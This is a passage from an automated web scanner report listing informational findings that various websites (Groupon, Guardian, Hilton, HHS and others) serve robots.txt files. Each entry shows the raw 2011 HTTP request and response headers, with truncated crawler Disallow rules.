ETag: "17c476-24-49cfb80e41c00"
Accept-Ranges: bytes
Content-Length: 36
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/plain

User-agent: ia_archiver
Disallow: /
24.375. http://www.greatschools.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.greatschools.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.greatschools.org

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41 (Unix) mod_perl/1.31 mod_ssl/2.8.31 OpenSSL/0.9.8e mod_jk/1.2.28
Vary: Accept-Encoding
Cache-Control: no-cache
Content-Type: text/plain;charset=UTF-8
Date: Sat, 02 Apr 2011 13:43:49 GMT
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Content-Language: en
Connection: close
Set-Cookie: TRACKING_NUMBER=1301751829; Domain=.greatschools.org; Path=/
Set-Cookie: COBRAND=www.greatschools.org; Domain=.greatschools.org; Path=/
Set-Cookie: COBRAND_TYPE=standard-adsgs; Domain=.greatschools.org; Path=/
Set-Cookie: JSESSIONID=C7526920DA8C4EA24141324EE95CF6FE; Path=/


User-agent: Googlebot
Disallow: /*&amp;*
Disallow: /*/popup
Disallow: /*/print
Disallow: /*;jsessionid*
Disallow: /access/
Disallow: /ads/
Disallow: /cgi-bin/$LCSTATE
Disallow: /cgi-bin/addcomments
D
...[SNIP]...
24.376. http://www.greenwichmeantime.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.greenwichmeantime.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.greenwichmeantime.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:58:32 GMT
Server: Apache/2.0.63 (Red Hat)
Last-Modified: Tue, 30 Jan 2007 21:59:47 GMT
ETag: "c8c037-1a8-1e204e80"
Accept-Ranges: bytes
Content-Length: 424
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /network/
Disallow: /manual/
Disallow: /imanager/
Disallow: /rss/
Disallow: /time/
Disallow: /time-zone/europe/uk/england/london/serviced-offices/avanta/

User-agent: M
...[SNIP]...
24.377. http://www.groupon.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.groupon.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.groupon.com

Response

HTTP/1.0 200 OK
Server: nginx/0.7.65
Content-Type: text/plain
Accept-Ranges: bytes
Age: 162369
Date: Sat, 02 Apr 2011 13:32:32 GMT
Last-Modified: Fri, 11 Mar 2011 17:55:00 GMT
Content-Length: 442
Connection: close

sitemap: http://www.groupon.com/sitemap.xml
User-agent: *
Disallow: /deals/update_deal_status
Disallow: /*/community
Disallow: /deals/*/confirmation
Disallow: /deals/*/memberships
Disallow: /users/*
D
...[SNIP]...
24.378. http://www.guardian.co.uk/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.guardian.co.uk
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.guardian.co.uk

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:31:59 GMT
Server: Apache
Set-Cookie: GU_MU=VFpjbFR3cjZERGtBQUhTdW9sOEFBQUNPfGRaNzZ1RFRXMTVpYTM5K0FaUXNZOXc9PQ==; path=/; domain=.guardian.co.uk; expires=Tue, 30-Mar-2021 13:31:59 GMT
Last-Modified: Fri, 03 Dec 2010 16:33:45 GMT
Accept-Ranges: bytes
Content-Length: 1725
Vary: Accept-Encoding,User-Agent
X-GU-httpd: 02
P3P: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONa TELa OUR IND ONLi UNI PURi NAV STA PRE LOC"
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

##ACAP version=1.0

# Conventional policies...
User-agent: *
Disallow: /sendarticle/
Disallow: /Users/
Disallow: /users/
Disallow: /*/print$
Disallow: /email/
Disallow: /contactus/
Disallow: /share/
D
...[SNIP]...
24.379. http://www.guitarcenter.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.guitarcenter.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.guitarcenter.com

Response

HTTP/1.1 200 OK
Content-Length: 478
Content-Type: text/plain
Last-Modified: Fri, 10 Sep 2010 18:25:24 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
SN: 88
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 14:14:52 GMT
Connection: close

User-agent: *

Disallow: /Ajax/
Disallow: /CS/
Disallow: /Includes/CustomDirectGuitars/
Disallow: /Includes/Interstate/
Disallow: /Includes/MIRetail/
Disallow: /Includes/MyMusicStore/
Disallow
...[SNIP]...
24.380. http://www.hallmark.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hallmark.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hallmark.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Fri, 25 Mar 2011 07:08:26 GMT
Accept-Ranges: bytes
ETag: "683de76fbbeacb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
WEBHOST: CW127
Content-Length: 170
Cache-Control: no-cache
Date: Sat, 02 Apr 2011 14:14:54 GMT
Connection: close

User-agent: *
Disallow: /iwov-resources
Disallow: /Home/Error?aspxerrorpath=
Disallow: /UserLogon
Disallow: /Reminders

Sitemap: http://www.hallmark.com/sitemap.xml
24.381. http://www.hayneedle.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hayneedle.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hayneedle.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:13:26 GMT
Server: Apache
Set-Cookie: SITE_ID=669;domain=.hayneedle.com;path=/
Set-Cookie: GLOBALBRANDTABDISPLAYFLAG=1;domain=.hayneedle.com;expires=Mon, 25-Mar-2041 14:13:26 GMT;path=/
Set-Cookie: CFID=1845784;expires=Mon, 25-Mar-2041 14:13:26 GMT;path=/
Set-Cookie: CFTOKEN=57735913;expires=Mon, 25-Mar-2041 14:13:26 GMT;path=/
Set-Cookie: SID=168FB1A4%2DCF69%2D72EF%2DF4C9356A2CCC8022;domain=.hayneedle.com;path=/
Set-Cookie: BRAND_SID=168FB1B2%2DF93E%2DE0F7%2D814A5C26BCA7B42A;domain=.hayneedle.com;path=/
Set-Cookie: GLOBAL_SID=168FB1C0%2DA207%2DCA5A%2D687007A141DCBCB7;domain=.hayneedle.com;expires=Mon, 25-Mar-2041 14:13:26 GMT;path=/
Set-Cookie: SITE_ID=669;path=/
Set-Cookie: SESSION_COUNTER=0;path=/
Set-Cookie: SIGNATURE=aL7Xj58q%2BfkKz9KGs%2BUbhLYwVO3pPWlTYAv362eycFXuRIg9Wxfh4TcWnCpUwT9K;domain=.hayneedle.com;path=/
Set-Cookie: GLOBAL_CUSTOMER_ACCOUNT=%3CwddxPacket%20version%3D%271%2E0%27%3E%3Cheader%2F%3E%3Cdata%3E%3Cstruct%3E%3Cvar%20name%3D%27CUSTOMER%5FID%27%3E%3Cstring%3E0%3C%2Fstring%3E%3C%2Fvar%3E%3Cvar%20name%3D%27CUSTOMER%5FFIRST%5FNAME%27%3E%3Cstring%3E%3C%2Fstring%3E%3C%2Fvar%3E%3Cvar%20name%3D%27SIGNED%5FIN%27%3E%3Cstring%3E%3C%2Fstring%3E%3C%2Fvar%3E%3C%2Fstruct%3E%3C%2Fdata%3E%3C%2FwddxPacket%3E;domain=.hayneedle.com;path=/
Set-Cookie: SKU_COMPARE=;domain=.hayneedle.com;expires=Mon, 25-Mar-2041 14:13:26 GMT;path=/
P3P: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT'
Cache-Control: max-age=300
Expires: Sat, 02 Apr 2011 14:18:26 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *

Disallow: /account/
Disallow: /checkout/
Disallow: /info/
Disallow: /qas/
Disallow: /search/
Disallow: /css/
Disallow: /js/
Disallow: /backyard/
Disallow: /nursery/
Disallow:
...[SNIP]...
24.382. http://www.hbo.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hbo.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hbo.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:15:40 GMT
Server: Apache
Last-Modified: Mon, 13 Sep 2010 19:43:57 GMT
ETag: "6b4-db-49029512ff940"
Accept-Ranges: bytes
Content-Length: 219
Cache-Control: max-age=60
Expires: Sat, 02 Apr 2011 14:16:40 GMT
Vary: Accept-Encoding
g: u
Connection: close
Content-Type: text/plain

User-agent: *
Allow: /
Disallow: /data/content/
Disallow: /utils/
Disallow: /config/
Disallow: /bin/
Disallow: /camp/
Sitemap: http://www.hbo.com/sitemap.xml
Sitemap: http://www.hbo.com/backen
...[SNIP]...
24.383. http://www.health.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.health.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.health.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:35:14 GMT
Server: Apache
Last-Modified: Thu, 03 Feb 2011 22:19:48 GMT
ETag: "517-29db8900"
Accept-Ranges: bytes
Content-Length: 1303
Content-Type: text/plain; charset=utf-8
Vary: Accept-Encoding,X-Catmap-Header
P3P: CP='PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE CUR ADMa DEVa TAIo PSAo PSDo IVAo IVDo CONo TELo OTPi OUR UNRo PUBi OTRo IND DSP CAO COR'
Connection: close

# Welcome to Pathfinder's robots.txt
#
# If you have any questions about indexing our site,
# especially regarding more efficient or convenient
# methods, please write to:
#
#
...[SNIP]...
24.384. http://www.healthcare.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.healthcare.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.healthcare.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:52:54 GMT
Server: Apache/2.2.9 (Debian) mod_fastcgi/2.4.6 mod_ssl/2.2.9 OpenSSL/0.9.8g
Last-Modified: Wed, 15 Jul 2009 16:04:25 GMT
ETag: "1174490-1719-46ec0b584d440"
Accept-Ranges: bytes
Content-Length: 5913
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

Sitemap: http://www.healthcare.com/sitemap.xml

User-agent:HealthCareCrawl
Disallow:/tag/
Disallow:/care-providers-directory/
Disallow:/search/
Disallow:/profile/
Disallow:/find/
Disallow:/pop
...[SNIP]...
24.385. http://www.healthcentral.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.healthcentral.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.healthcentral.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CUR CONi OUR DELi SAMi OTRi STP STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Accept-Ranges: bytes
Last-Modified: Tue, 01 Mar 2011 21:19:28 GMT
ETag: "1CBD85658DF3000:1CBF13BFE6133FE"
Content-Type: text/plain
Content-Length: 1057
Expires: Sat, 02 Apr 2011 13:43:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:43:57 GMT
Connection: close
Set-Cookie: THCN=r4172361686; path=/; expires=Fri, 1 Jan 2010 01:01:50 GMT

User-agent: *
Sitemap: http://www.healthcentral.com/hc_sitemap.xml
Sitemap: http://www.healthcentral.com/common/h/sitemaps/google_index.xml
Sitemap: http://www.healthcentral.com/profiles/c/sitemaps
...[SNIP]...
24.386. http://www.healthgrades.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.healthgrades.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.healthgrades.com

Response

HTTP/1.1 200 OK
Content-Length: 1704
Content-Type: text/plain
Last-Modified: Thu, 04 Mar 2010 23:24:02 GMT
Accept-Ranges: bytes
ETag: "a561c6c6f1bbca1:19f2"
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml",CP="NON DSP COR PSDa OUR NOR UNI"
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:25:13 GMT
Connection: close
Set-Cookie: BIGipServerHealthgrades=1846280202.20480.0000; path=/
Vary: Accept-Encoding

User-agent: *
Disallow: /ContentLic/
Disallow: /Contentlic/
Disallow: /contentlic/
Disallow: /Consumer/
Disallow: /consumer/
Disallow: /Employers/
Disallow: /employers/
Disallow: /Videos/
Dis
...[SNIP]...
24.387. http://www.healthline.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.healthline.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.healthline.com

Response

HTTP/1.0 200 OK
Server: Apache
P3P: CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: private, max-age=0, no-cache, no-store
Expires: -1
Pragma: no-cache
Content-Type: text/plain; charset=UTF-8
Date: Sat, 02 Apr 2011 13:41:44 GMT
Content-Length: 6982
Connection: close
Set-Cookie: dbsid=3b6618ee-36ee-4559-8276-5dac60329d24; Path=/
Set-Cookie: pv=1; Expires=Mon, 02-May-2011 13:41:44 GMT; Path=/

User-agent: Googlebot
Disallow: /search?q1=
Disallow: /Email%20this%20article%20to%20a%20friend
Disallow: /Print%20this%20article
Disallow: /Save%20this%20article
Disallow: /Tell%20a%20friend
Disallow
...[SNIP]...
24.388. http://www.helium.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.helium.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.helium.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:28 GMT
Last-Modified: Wed, 16 Feb 2011 21:43:28 GMT
Content-Type: text/plain
Content-Length: 371
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.helium.com/P3P/PolicyReferences.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Connection: close

# See http://www.robotstxt.org/wc/norobots.html [^] for documentation on how to use the robots.txt file

User-agent: *
Disallow: /rss/
Disallow: /login
Disallow: /registration/
Disallow: /show_r
...[SNIP]...
24.389. http://www.hgtv.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hgtv.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hgtv.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix)
Last-Modified: Wed, 24 Dec 2008 20:39:42 GMT
Accept-Ranges: bytes
Content-Length: 537
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:45:25 GMT
Connection: close

###############################
#
# hgtv.com robots.txt file
#
# addresses all robots by using wild card *

User-agent: *


# list folders robots are not allowed to index

Disallow: /cr/
Disallow
...[SNIP]...
24.390. http://www.hhs.gov/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hhs.gov
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hhs.gov

Response

HTTP/1.0 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/plain; charset=UTF-8
Last-Modified: Tue, 13 Jul 2010 14:12:26 GMT
Content-Length: 479
ETag: "1df-4c3c744a"
Accept-Ranges: bytes
Date: Sat, 02 Apr 2011 14:20:09 GMT
Connection: close

# robots.txt for http://www.hhs.gov
# robots.txt for http://www.os.dhhs.gov
# robots.txt for http://www.dhhs.gov
# robots.txt for http://os.dhhs.gov:80

user-agent: * # directed to all spiders, not j
...[SNIP]...
24.391. http://www.hi5.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hi5.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hi5.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"216-1275608514000"
Last-Modified: Thu, 03 Jun 2010 23:41:54 GMT
Content-Type: text/plain
Content-Length: 216
Date: Sat, 02 Apr 2011 13:34:03 GMT
Connection: keep-alive
Set-Cookie: NSC_bqq-tfswfst-ofxvj=e246b3293660;expires=Sat, 02-Apr-11 14:16:48 GMT;path=/

User-agent: Mediapartners-Google*
Disallow:

User-agent: *
Disallow: /friend/message/displayMessageCenter.do
Disallow: /friend/viewFriends.do
Disallow: /friend/displayLogin.do
Disallow: /friend
...[SNIP]...
24.392. http://www.hiexpress.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hiexpress.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hiexpress.com

Response

HTTP/1.0 200 OK
Server: Resin/3.1.6
Content-Type: text/plain; charset=utf-8
P3P: CP="OTI DSP COR DEVa OUR NOR",policyref="http://dcs.ichotelsgroup.com/w3c/p3p.xml"
ETag: "ClWWxhoQhlF"
Last-Modified: Tue, 29 Mar 2011 21:59:26 GMT
Accept-Ranges: bytes
Content-Length: 438
Expires: Sat, 02 Apr 2011 13:36:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:36:17 GMT
Connection: close
Set-Cookie: TLTSID=2FDED8C45D2E105D0107D50ADC66F426; Path=/; Domain=.hiexpress.com
Set-Cookie: TLTUID=2FDED8C45D2E105D0107D50ADC66F426; Path=/; Domain=.hiexpress.com; expires=Sat, 02-04-2021 13:36:17 GMT
Set-Cookie: wwwcluster=one; domain=.hiexpress.com; path=/
Set-Cookie: datacenternode=us-md-vz; domain=.hiexpress.com; path=/
Set-Cookie: RJESSESSIONID=obrH7GJV30Wl19H3ABw8s; domain=hiexpress.com; path=/

# robots.txt for http://www.hiexpress.com/

User-agent: OmniExplorer_Bot
Disallow: /

User-agent: NaverBot-1.0
Disallow: /

User-agent: NaverBot
Disallow: /

User-agent: Mizzu Labs 2.2
Dis
...[SNIP]...
24.393. http://www.hilton.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hilton.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hilton.com

Response

HTTP/1.0 200 OK
Server: Netscape-Enterprise/6.0
Content-Type: text/plain
ETag: "0-0-0-63cc"
Last-Modified: Thu, 28 Jan 2010 20:51:29 GMT
Cache-Control: private
Date: Sat, 02 Apr 2011 13:37:50 GMT
Content-Length: 25548
Connection: close

# Daytime instructions for search engines
# Do not visit Hilton.com during the day!
User-agent: Googlebot
Disallow: /guestlocale/
Disallow: /en/hhonors/login/owner_login.jhtml
Disallow: /en/hi/groups/
...[SNIP]...
24.394. http://www.history.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.history.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.history.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.11 (Unix)
Last-Modified: Mon, 21 Mar 2011 16:37:50 GMT
ETag: "172092a-1c9-49f00bf96f380"
Accept-Ranges: bytes
Content-Length: 457
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:44:48 GMT
Connection: close

User-agent: *

# Block Ajax snippets from indexing.
Disallow: /ajax/
Disallow: /flash/
Disallow: /global/
Disallow: /xml/
Disallow: /images/media
Disallow: /bcplayers
Disallow: /imgs/decoration/
Disal
...[SNIP]...
24.395. http://www.holidayinn.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.holidayinn.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.holidayinn.com

Response

HTTP/1.0 200 OK
Server: Resin/3.1.6
Content-Type: text/plain; charset=utf-8
P3P: CP="OTI DSP COR DEVa OUR NOR",policyref="http://dcs.ichotelsgroup.com/w3c/p3p.xml"
ETag: "F6OrH5gL6rf"
Last-Modified: Tue, 29 Mar 2011 21:59:26 GMT
Accept-Ranges: bytes
Content-Length: 380
Expires: Sat, 02 Apr 2011 13:33:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:33:20 GMT
Connection: close
Set-Cookie: TLTSID=C64E3F805D2D105D0040B3F0BEBF8E6E; Path=/; Domain=.holidayinn.com
Set-Cookie: TLTUID=C64E3F805D2D105D0040B3F0BEBF8E6E; Path=/; Domain=.holidayinn.com; expires=Sat, 02-04-2021 13:33:20 GMT
Set-Cookie: wwwcluster=one; domain=.holidayinn.com; path=/
Set-Cookie: datacenternode=us-md-vz; domain=.holidayinn.com; path=/
Set-Cookie: RJESSESSIONID=jnpjekFFIDbUS9VJVAw8s; domain=holidayinn.com; path=/

# robots.txt for http://www.holidayinn.com/

User-agent: OmniExplorer_Bot
Disallow: /

User-agent: NaverBot-1.0
Disallow: /

User-agent: NaverBot
Disallow: /

User-agent: Mizzu Labs 2.2
Di
...[SNIP]...
24.396. http://www.hollywood.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hollywood.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hollywood.com

Response

HTTP/1.1 200 OK
Content-Length: 3344
Content-Type: text/plain
Last-Modified: Wed, 24 Mar 2010 20:59:41 GMT
Accept-Ranges: bytes
ETag: "553e92ec94cbca1:c31"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:32:56 GMT
Connection: close

# /robots.txt file for http://www.hollywood.com/

# ---------------------------------------------------------------------
# Crawl-Delay
#
User-agent: *
Crawl-delay: 10

User-agent: Slurp
Craw
...[SNIP]...
24.397. http://www.hollywoodlife.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hollywoodlife.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hollywoodlife.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Server: nginx/0.7.62
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Content-Length: 243
Date: Sat, 02 Apr 2011 13:54:08 GMT
Connection: close

User-agent: *
Disallow: /print-post/
Disallow: /wp-admin/
   
User-agent: Googlebot-Mobile
Disallow: /
       
Sitemap: http://www-hollywoodlife-com.vimg.net/sitemap.xml
Sitemap: http://www-hollywood
...[SNIP]...
24.398. http://www.hollywoodreporter.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hollywoodreporter.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hollywoodreporter.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Type: text/plain; charset=UTF-8
X-Powered-By: PHP/5.3.5
Date: Sat, 02 Apr 2011 13:44:55 GMT
Content-Length: 1572
Connection: close

# $Id: robots.txt,v 1.9.2.2 2010/09/06 10:37:16 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...
24.399. http://www.home-remedies-for-you.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.home-remedies-for-you.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.home-remedies-for-you.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:20:07 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 08 Jun 2009 06:44:17 GMT
ETag: "2a40038-42-46bd092329240"
Accept-Ranges: bytes
Content-Length: 66
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: */blog/page*
Disallow: */addanswer.html
24.400. http://www.homedepot.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.homedepot.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.homedepot.com

Response

HTTP/1.0 200 OK
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix)
Last-Modified: Fri, 26 Nov 2010 21:06:16 GMT
ETag: "1029-538-17d4e200"
Content-Type: text/plain
Expires: Sat, 02 Apr 2011 13:24:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:24:42 GMT
Content-Length: 1336
Connection: close
Set-Cookie: Coradiantuserid=288df00d-9eee-1ce7-9678-00e0ed0ed026
Set-Cookie: NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0245525d5f4f58455e445a4a422991;path=/;httponly

# robots.txt for http://www.homedepot.com/
User-agent: *
Disallow: /*SiteMapView*
Disallow: /*Navigation?Ns=P_Topseller_Sort|style=List*
Disallow: /*Navigation?Ns=P_Topseller_Sort|style=A*
Disallow: /
...[SNIP]...
24.401. http://www.homegain.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.homegain.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.homegain.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:14:07 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8e-fips-rhel5
Last-Modified: Thu, 02 Sep 2010 17:58:24 GMT
ETag: "118c88a-3a3-48f4a8f74f000"
Accept-Ranges: bytes
Content-Length: 931
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP UNI COM NAV INT STA PRE"
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /goto
Disallow: /go_offsite
Sitemap: http://www.homegain.com/sitemap.xml
Sitemap: http://www.homegain.com/homegain_listings_sitemap_index.xml
Sitemap: http://www.homegain.com/p
...[SNIP]...
24.402. http://www.homes.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.homes.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.homes.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:27:52 GMT
Last-Modified: Tue, 01 Mar 2011 13:51:21 GMT
ETag: "4dd37-107-49d6c175f6840"
Accept-Ranges: bytes
Content-Length: 263
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# /robots.txt file for http://www.homes.com
# e-mail web@homes.com for issues

User-agent: *
Disallow: /Include/
Disallow: /Utilities/
Disallow: /Content/OfficeDetail.cfm
Disallow: /HomesCom/In
...[SNIP]...
24.403. http://www.homestead.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.homestead.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.homestead.com

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:34:02 GMT
Content-Type: text/plain
Accept-Ranges: bytes
Last-Modified: Fri, 04 Feb 2011 17:43:20 GMT
ETag: "0ac3393c4cb1:7"
Content-Length: 625

# Block a bot that was causing issues by ignoring Disallow lines below
User-Agent: OmniExplorer_Bot
Disallow: /

# Block hotlinking of music files by projectplaylist.com due to perceived user band
...[SNIP]...
24.404. http://www.hometownlocator.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hometownlocator.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hometownlocator.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: text/plain
Last-Modified: Tue, 19 Feb 2008 17:05:50 GMT
Accept-Ranges: bytes
ETag: "3224cbad1973c81:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:52:59 GMT
Connection: close
Content-Length: 208

User-agent: *
Disallow: /City-Tools/
Disallow: /County-Tools/
Disallow: /State-Tools/
Disallow: /ZIP-Code-Tools/
Disallow: /includes/
Disallow: /utilities/
Disallow: /cgi-bin/
Disallow: /HTLAd
...[SNIP]...
24.405. http://www.hotels.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotels.com
